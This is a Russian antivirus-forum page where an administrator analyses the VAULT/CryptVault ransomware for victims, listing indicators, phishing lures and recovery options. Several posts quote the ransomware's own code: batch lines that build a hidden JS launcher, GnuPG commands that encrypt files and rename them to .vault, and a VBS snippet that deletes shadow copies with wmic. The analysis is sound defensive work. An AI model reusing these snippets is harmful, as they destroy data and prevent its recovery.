Вход
Уважаемые пользователи!

Поставщик ИТ-решений PRO32 сообщает вам, что после 17 лет сотрудничества мы более не являемся эксклюзивным дистрибьютором программных продуктов словацкого разработчика ESET в России, Республике Беларусь, Казахстане, Азербайджане, Узбекистане, Кыргызстане, Таджикистане, Туркменистане, Молдове, Грузии и Армении.

Купить и продлить лицензии ESET на нашем сайте больше нельзя.

Предлагаем вам попробовать новый антивирус от компании PRO32.

Продукты PRO32 — это технологичные решения, надежная защита от киберугроз и максимальная производительность устройств на Windows / Android.

Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Скопируйте его и после добавления товара в корзину, не забудьте его применить в корзине.

Перейти на PRO32
Поиск  Пользователи  Правила  Войти
Пользователи santy
Выбрать дату в календареВыбрать дату в календаре

Пред. 1 ... 493 494 495 496 497 498 499 500 501 502 503 ... 1784 След.
[ Закрыто] VAULT. что делать?, bat encoder / CryptVault
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 28.10.2015 20:59:59
[QUOTE]valeg odminchik написал:
Вот закрытый ключ(export)(может кому еще поможет)[/QUOTE]
в том и "прелесть" PGP, что ключ уникален, и полезен в расшифровке лишь в одном случае и одному пользователю.
остальным полезен, разве что взглянуть на него, как он выглядит по своему содержанию.
Перейти
поговорить о uVS, Carberp, планете Земля
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 28.10.2015 15:27:46
угу, вчера засветился
[IMG WIDTH=560 HEIGHT=448]http://s020.radikal.ru/i707/1510/ae/e28d9f0707e4.jpg[/IMG]

[email protected] 1.2.0.0.id-JKKLMNOOOPPQRRSTTTUVVWXXXYZZABBBCDDE-25.10.2015 20@[email protected]
Изменено: santy - 28.10.2015 15:29:17
Перейти
файлы зашифрованы с расширением .vault, bat encoder /CryptVault
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 28.10.2015 15:17:02
вот этот скриптик надо удалять
[QUOTE]echo var cdp="%%TEMP%%\\a01dc229.cmd";var WshShell=CreateObject("WScript.Shell");cdp=WshShell.ExpandEnvironmentStrings(cdp);function CreateObject(fq){return new ActiveXObject(fq)}function xx(cdp){WshShell.Run(cdp,0,0);}>> "%temp%\7c62070c.js"
[/QUOTE]
тот что выше, похоже, используют как обманку для антивируса. два однотипных скрипта, но только один из них запускает процесс шифрования.
а на него как раз - ноль реакции, хотя именно он содержит ссылку на командный файл a01dc229.cmd, в котором собраны все команды шифрования файлов. после обхода дисков и очистки от лишних строк.

вот с этим содержимым и надо ловить файл, здесь инфы предостаточно, чтобы отловить его.
[QUOTE]chcp 866
"%TeMp%\d4a76286.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "C:\файлы для тестирования шифровальщиков\15092014 16_55_03.xls"& move /y "C:\файлы для тестирования шифровальщиков\15092014 16_55_03.xls.gpg" "C:\файлы для тестирования шифровальщиков\15092014 16_55_03.xls"& rename "C:\файлы для тестирования шифровальщиков\15092014 16_55_03.xls" "15092014 16_55_03.xls.vault"
"%TeMp%\d4a76286.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "C:\файлы для тестирования шифровальщиков\32 ремонтный завод .xls"& move /y "C:\файлы для тестирования шифровальщиков\32 ремонтный завод .xls.gpg" "C:\файлы для тестирования шифровальщиков\32 ремонтный завод .xls"& rename "C:\файлы для тестирования шифровальщиков\32 ремонтный завод .xls" "32 ремонтный завод .xls.vault"
[/QUOTE]
Изменено: santy - 04.06.2016 18:08:54
Перейти
файлы зашифрованы с расширением .vault, bat encoder /CryptVault
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 28.10.2015 15:10:09
27.10.2015 11:15:29 Защита в режиме реального времени файл C:\Users\23\AppData\Local\Temp\27ddf88e.js BAT/Filecoder.AG троянская программа очищен удалением - изолирован 23-ПК\23 Событие произошло в новом файле, созданном следующим приложением: C:\Windows\System32\cmd.exe.

[QUOTE]echo var cdp="%%TEMP%%\\05542988.cmd";var WshShell=CreateObject("WScript.Shell");cdp=WshShell.ExpandEnvironmentStrings(cdp);function CreateObject(fq){return new ActiveXObject(fq)}function xx(cdp){WshShell.Run(cdp,0,0);}xx(''+cdp+'');> "%temp%\27ddf88e.js"
[/QUOTE]

этот скриптик, скорее всего уже после запуска был удален. здесь удаление файла не повлияло на процесс шифрования.
Изменено: santy - 04.06.2016 18:08:54
Перейти
файлы зашифрованы с расширением .vault, bat encoder /CryptVault
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 28.10.2015 14:50:33
Станислав,
если не трудно, добавьте [URL=http://forum.esetnod32.ru/forum9/topic1408/]лог журнала обнаружения угроз.[/URL]
судя по рисунку, ESET прибил скриптик vbs, который удаляет теневые копии, возможно до его запуска, потому теневые копии сохранились

судя по коду шифратора так и есть.
[CODE]echo Set objShell = CreateObject^("Shell.Application"^) > "%temp%\59665d79.vbs"
echo Set objWshShell = WScript.CreateObject^("WScript.Shell"^) >> "%temp%\59665d79.vbs"
echo Set objWshProcessEnv = objWshShell.Environment^("PROCESS"^) >> "%temp%\59665d79.vbs"
echo objShell.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0 >> "%temp%\59665d79.vbs"[/CODE]
Изменено: santy - 04.06.2016 18:07:56
Перейти
Подозрение AVZ на Rootkit в антивирусе и браузере.
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 28.10.2015 04:43:35
добавьте новый образ, из безопасного режима системы
Перейти
[ Закрыто] VAULT. что делать?, bat encoder / CryptVault
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 28.10.2015 04:41:59
Сергей,
[QUOTE]Sergey Lobashev написал:
Нашёл 43487a9e.ca8469cb, но там ))) :

[/QUOTE]
43487a9e.ca8469cb - здесь это другой файл, содержит отчет о найденных на диске паролях

                                **********************************************
                                         Browser Password Recovery Report
                               **********************************************

созданный этой утилитой
____________________________________________________________­__________
Produced by BrowserPasswordDump from http://www.SecurityXploded.com

ключ же экспортируется сюда, до момента его шифрования
e6335bfe.7c8f89eb

без ключа, который был создан в secring.gpg
или без экспортированного из secring.gpg в файл e6335bfe.7c8f89eb
расшифровка невозможна.
Изменено: santy - 28.10.2015 04:42:21
Перейти
[ Закрыто] VAULT. что делать?, bat encoder / CryptVault
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 27.10.2015 14:50:28
установил виртуалку, попробую найти "10 отличий" от тех вариантов что были в августе

по ВАУЛТ изменений нет. расшифровка возможна только при наличие живого secring.gpg
времени достаточно - 2года активности (данного шифратора), чтобы понять, что расшифровку ждать бессмысленно, необходимо принимать жесточайшие меры по предотвращению подобных запусков с помощью политик, или использовать нестандартные решения.
-------
1. для предотвращения запуска шифратора блокируем адрес
*revault.me*
2. для шифрования secring.gpg юзера используется новый ключ мошенников:
VaultCrypt
0x35E2868D
от 23 октября 2015 г
3.для восстановления secring.gpg ищем среди удаленных файл:
e6335bfe.7c8f89eb
4. утилита gpg.exe переименована в d4a76286.exe
gpg (GnuPG) 1.4.18
Copyright © 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Home: C:/Users/***/AppData/Roaming/gnupg
Supported algorithms:
Pubkey: RSA, RSA-E, RSA-S, ELG-E, DSA
Cipher: IDEA, 3DES, CAST5, BLOWFISH, AES, AES192, AES256, TWOFISH,
       CAMELLIA128, CAMELLIA192, CAMELLIA256
Hash: MD5, SHA1, RIPEMD160, SHA256, SHA384, SHA512, SHA224
Compression: Uncompressed, ZIP, ZLIB, BZIP2
5. тело бат-шифратора:
vb17330200.bat

6. текст сообщения
[QUOTE]Тема: Акт Сверки - октябрть

Добрый час, Мы со своей стороны понимаем, что в стране кризис, но все же мое руководство распорядилoсь подписать с Вами Акт сверки (см. приложение к письму) и отобразить имеющийся долг. Будьте добры проверить приложенный документ и сориентировать по срокам оплаты.[/QUOTE]

7. имя исполняемого js из вложения
Акт_сверки_27 октября 2015 года_задолженность по счетам за прошлые периоды_бухгалтерия - согласовано_аудит - ПОДПИСАНО_f41f9a6ff9d.dосх .js
эта часть может меняться
f41f9a6ff9d
и
Акт сверки от 27 октября 2015г. Задолженность по счетам за прошлые периоды. Согласовано бухгалтерией. Подписано директором_ 17525167491.рdf .js
Изменено: santy - 27.10.2015 17:55:14
Перейти
[ Закрыто] VAULT. что делать?, bat encoder / CryptVault
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 27.10.2015 13:19:49
судя по сообщениям, ВАУЛТ вновь активен.
https://www.virustotal.com/ru/file/d84c4e2edfb1762defec41258df3a6abe1bb6295d530de96­9e891a45e35d8efb/analysis/1445941012/
второй вариант
https://www.virustotal.com/ru/file/17b4e407f4acd65ef6558c1a4763552ae249882b523932ba­dc6eb4b99ad77304/analysis/1445946550/
Изменено: santy - 27.10.2015 14:54:04
Перейти
файлы зашифрованы в Cryakl CL 0.1.*.*-1.3.*.*, Filecoder.EQ/Encoder.567/Cryakl
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 27.10.2015 12:26:18
Андрей,
восстановление документов реально, но при определенных условиях.
прочтите здесь по методам восстановление документов после шифрования.
http://forum.esetnod32.ru/forum35/topic11575/
возможно, какой-то из данных методов поможет вам.
Изменено: santy - 22.02.2020 16:26:53
Перейти
Пред. 1 ... 493 494 495 496 497 498 499 500 501 502 503 ... 1784 След.